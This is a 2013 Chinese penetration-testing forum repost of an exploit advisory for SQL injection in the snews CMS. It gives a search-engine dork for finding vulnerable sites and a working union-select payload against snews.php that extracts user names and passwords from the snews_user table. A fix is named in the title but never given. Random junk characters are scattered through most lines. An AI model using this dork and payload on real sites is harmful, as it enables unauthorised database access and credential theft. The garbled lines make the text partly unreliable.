中国网络渗透测试联盟

标题: CMS snews SQL注射及修复 [打印本页]
作者: admin    时间: 2013-1-23 08:55
标题: CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability! a$ p( P% [7 j+ X
作者: By onestree
6 B5 z" z& w, d4 E( x9 y- O9 K下载地址 : http://snewscms.com/
' q  s4 m; i$ L. |; h2 v测试平台 : ubuntu 12.10 / win 7
& o4 P* A  u3 n4 ]关键词: inurl:"tanyakan pada rumput yang bergoyang"
7 p: [1 @4 i/ ]2 Z " Q0 w7 a+ P' t- Q$ Z

- e9 C* v5 m  n*************************************************************0 k  I5 t$ r( R6 [' X5 \( L

$ j. J0 e. V) q- ]SQL poc:
% D$ z3 b, r6 ?5 z 1 x) R1 M9 I: [8 |0 c6 U
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]* U$ c  i: v7 h. N; ^4 ]/ ]

% i' H$ D4 W+ ]9 m, R0 D0 c$ a$ Q示例
1 a+ j. Z6 N7 q
. q! v3 j: L3 Chttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*0 r2 W; G8 ]) F$ I! V0 }" x8 U( D

! L" G& V0 v( ` 0 a# h2 L5 `" d' {: D* G8 `; ]
致谢:5 G% \9 ]4 H% B4 c' A
4 ], k, V7 [- _
  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell  t" r' E6 F9 }% W$ ^. O
     - O. F, r, b0 T) `* n0 X- u) R# E$ p! ~
          indonesiancoder - moeslimh4x0r - go-coder
  K" J4 I; Z7 ]6 S1 f( p1 C
, s5 M: z- M. b# l! U$ {! Y  ispesial my hunny :*
9 C9 |5 Z7 V, i' M* T



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2